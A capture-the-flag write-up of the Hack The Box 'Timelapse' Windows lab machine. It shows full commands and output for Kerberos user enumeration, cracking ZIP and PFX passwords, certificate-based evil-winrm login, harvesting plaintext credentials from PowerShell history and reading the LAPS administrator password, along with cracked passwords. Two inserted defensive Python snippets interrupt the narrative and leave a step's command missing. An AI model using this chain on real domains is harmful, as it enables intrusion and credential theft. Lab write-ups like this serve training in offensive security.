[HTB] Timelapse
2022-04-08 22:50:49

Foreword

There is no Chinese input method in Kali, so please forgive my English.

Enumeration

nmap

┌──(root💀kali)-[~]
└─# nmap -sC -sV -T4 10.10.11.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 16:17 CST
Nmap scan report for 10.10.11.152
Host is up (0.58s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-08 16:19:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m34s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-04-08T16:20:31
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.90 seconds

Add the domain timelapse.htb to /etc/hosts.

Out-of-domain username enumeration

┌──(root💀kali)-[/opt/tools/domain_tools]
└─# ./kerbrute userenum -d timelapse.htb /usr/share/seclists/Usernames/top-usernames-shortlist.txt --dc 10.10.11.152

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/08/22 - Ronnie Flathers @ropnop

2022/04/08 16:50:09 >  Using KDC(s):
2022/04/08 16:50:09 >   10.10.11.152:88

2022/04/08 16:50:10 >  [+] VALID USERNAME:       guest@timelapse.htb
2022/04/08 16:50:10 >  [+] VALID USERNAME:       administrator@timelapse.htb
2022/04/08 16:50:11 >  Done! Tested 17 usernames (2 valid) in 1.377 seconds

smbmap

┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.11.152 -u guest
[+] IP: 10.10.11.152:445        Name: timelapse.htb                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Shares                                                  READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share

smbmap shows that the guest account has read access to the Shares share.

Logging in as guest with smbclient, there is a backup zip file:

┌──(root💀kali)-[/opt/tools/domain_tools]
└─# smbclient -U guest -W timelapse.htb //timelapse.htb/Shares
Enter TIMELAPSE.HTB\guest's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 23:39:15 2021
  ..                                  D        0  Mon Oct 25 23:39:15 2021
  Dev                                 D        0  Tue Oct 26 03:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 23:48:42 2021

                6367231 blocks of size 4096. 1382234 blocks available
smb: \> cd dev
smb: \dev\> ls
  .                                   D        0  Tue Oct 26 03:40:06 2021
  ..                                  D        0  Tue Oct 26 03:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 23:46:42 2021

                6367231 blocks of size 4096. 1382218 blocks available

get it!

Brute password

Unzipping the backup file requires a password.

So I need to find the password first.

┌──(kali㉿kali)-[~]
└─$ zip2john winrm_backup.zip > hash.txt
                   
┌──(kali㉿kali)-[~]
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2022-04-08 17:54) 3.846g/s 13359Kp/s 13359Kc/s 13359KC/s surki..superkeep16
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Got the password: supremelegacy

Unzip the archive to get the legacyy_dev_auth.pfx file. This file also needs a password to open, so use john again:

python pfx2john.py ~/legacyy_dev_auth.pfx > ~/pfx_hash.txt

john pfx_hash.txt --format=pfx --wordlist=/usr/share/wordlists/rockyou.txt

Got the password: thuglegacy

Unlocking the pfx file, I found a file named Legacyy in it, and the name is a valid username in Kerberos:

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/08/22 - Ronnie Flathers @ropnop

2022/04/08 18:49:18 >  Using KDC(s):
2022/04/08 18:49:18 >   10.10.11.152:88

2022/04/08 18:49:18 >  [+] VALID USERNAME:       Legacyy@timelapse.htb
2022/04/08 18:49:18 >  Done! Tested 1 usernames (1 valid) in 0.320 seconds

User flag

I tried to brute-force legacyy's password with kerbrute, but failed.

So, let's go back to where we started. We found a backup file named winrm_backup.zip. Unzipping it, we get legacyy_dev_auth.pfx.

Maybe WinRM is a component or service in Windows. I searched for it on Google and found Microsoft's explanation:

Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate.

I consider WinRM similar to SSH, so credentials are also required.

As we all know, a pfx file usually contains an X.509 certificate and its private key, and we haven't used legacyy_dev_auth.pfx yet. So I think the pfx can be used for certificate authentication in WinRM. Let's separate the private key and the X.509 certificate from the pfx file:

openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out Legacyy.pem

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out cert.key -nodes

Now the problem is how to connect to Windows over WinRM from Linux (Kali). I found a tool named evil-winrm on GitHub, which can connect to a remote computer by WinRM and use certificates for authentication. Installation is simple in Kali: sudo apt-get install evil-winrm

Let’s connect!

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.11.152 -S -c Legacyy.pem -k cert.key 

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy

Get the user flag in c:\users\legacyy\desktop\user.txt

Root flag

After a long and futile enumeration, prompted by pyp in the forum and this blog, I found the PowerShell history file:

*Evil-WinRM* PS C:\users\legacyy\appdata\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

WOW, there are svc_deploy's credentials. Following the history commands, we can execute commands as the svc_deploy user:
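A defender's check for the same failure mode, added here as an example (not code from the writeup): a small Python scanner over a constructed PSReadLine history that flags plaintext secrets passed to ConvertTo-SecureString, PSCredential construction, and session options that disable TLS validation, without echoing the secret itself.

```python
import re
from typing import Dict, List

# Constructed sample PSReadLine history, modelled on the shape of the
# ConsoleHost_history.txt shown above; the password is a placeholder,
# not the box's real value.
SAMPLE_HISTORY = """whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Placeholder-Pass-123' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
"""

# A quoted literal handed to ConvertTo-SecureString with -AsPlainText means
# the secret sits in clear text in the history file.
PLAINTEXT_SECRET = re.compile(
    r"ConvertTo-SecureString\s+(['\"])(?P<secret>.+?)\1.*-AsPlainText", re.I)
# Username passed when building a PSCredential object.
PSCREDENTIAL_USER = re.compile(
    r"PSCredential\s*\(\s*['\"](?P<user>[^'\"]+)['\"]", re.I)
# Session options that switch off certificate validation for the WinRM session.
TLS_BYPASS = re.compile(r"-Skip(?:CA|CN|Revocation)Check", re.I)

def scan_history(text: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious history line; secrets are redacted."""
    findings: List[Dict[str, object]] = []
    for n, line in enumerate(text.splitlines(), start=1):
        opts = [m.group(0) for m in TLS_BYPASS.finditer(line)]
        if opts:
            findings.append({"line": n, "kind": "tls_validation_disabled",
                             "detail": "skips " + " ".join(opts)})
        m = PLAINTEXT_SECRET.search(line)
        if m:
            findings.append({"line": n, "kind": "plaintext_secret",
                             "detail": f"{len(m.group('secret'))}-char secret redacted"})
        m = PSCREDENTIAL_USER.search(line)
        if m:
            findings.append({"line": n, "kind": "credential_object",
                             "detail": f"user={m.group('user')}"})
    return findings

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['kind']} ({f['detail']})")
```

Run it against each user's ConsoleHost_history.txt under AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine to find credentials that need rotating.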

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers                      Group            S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

The svc_deploy user is a member of the LAPS_Readers group. After some googling, I found that LAPS_Readers group members can read the local administrator password that LAPS stores on computer objects (the ms-Mcs-AdmPwd attribute):

invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Identity dc01 -properties * | findstr ms-Mcs-AdmPwd}

I got the password of administrator!

ms-Mcs-AdmPwd                        : )Vls1+OD0%8WlDdJ6Q)G!4)-
ms-Mcs-AdmPwdExpirationTime          : 132943373149524209
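The expiration attribute next to the password is a Windows FILETIME (100-nanosecond ticks since 1601-01-01 UTC). As an added example, not from the writeup, this Python snippet decodes the value shown above and gives a defender a simple staleness check: an expiry in the past that LAPS has not pushed forward means the password is not being rotated.

```python
from datetime import datetime, timedelta, timezone

# FILETIME epoch: 1601-01-01 00:00:00 UTC, counted in 100-ns ticks.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(filetime: int) -> datetime:
    """Convert a FILETIME integer (e.g. ms-Mcs-AdmPwdExpirationTime) to a UTC datetime."""
    seconds, ticks = divmod(int(filetime), 10**7)
    # Integer arithmetic throughout, so large values do not lose precision.
    return FILETIME_EPOCH + timedelta(seconds=seconds, microseconds=ticks // 10)

def laps_password_overdue(expiration_filetime: int, now_iso: str) -> bool:
    """True if the LAPS expiry has already passed at the given UTC time (ISO 8601 string)."""
    now = datetime.fromisoformat(now_iso)
    if now.tzinfo is None:
        now = now.replace(tzinfo=timezone.utc)
    return filetime_to_datetime(expiration_filetime) < now

# Value read from the dc01 computer object in the writeup.
EXPIRY_FROM_WRITEUP = 132943373149524209

if __name__ == "__main__":
    print("expires:", filetime_to_datetime(EXPIRY_FROM_WRITEUP).isoformat())
    # Checked against the date of the writeup (2022-04-08): not yet due.
    print("overdue on 2022-04-08:", laps_password_overdue(EXPIRY_FROM_WRITEUP, "2022-04-08"))
```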

Now, log in as administrator!

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.11.152 -S -u administrator -p ')Vls1+OD0%8WlDdJ6Q)G!4)-'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
timelapse\administrator

Get the root flag in c:\users\TRX\desktop\root.txt